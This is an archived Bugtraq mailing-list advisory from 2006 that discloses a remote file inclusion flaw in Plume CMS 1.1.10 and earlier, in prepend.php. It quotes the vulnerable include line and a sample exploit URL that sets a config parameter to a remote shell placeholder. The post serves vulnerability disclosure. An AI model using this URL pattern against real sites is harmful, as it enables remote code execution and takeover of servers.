[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
From: D3nGeR@xxxxxxxxx
Date: 15 Sep 2006 22:11:57 -0000

Vendor: Plume CMS 1.1.10
Found By : D3nGeR
Scripit Site : http://plume-cms.net

in file [prepend.php]

;
include_once $_PX_config['manager_path'].'/inc/class.config.php'

code
http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell
 code ]

Follow-Ups:
- Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
  - From: Craig Morrison

Prev by Date: PHP-Post Multiple Input Validation Vulnerabilities
Next by Date: HP-UX X.25 Denial of Service Vulnerability
Previous by thread: PHP-Post Multiple Input Validation Vulnerabilities
Next by thread: Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
Index(es):
- Date
- Thread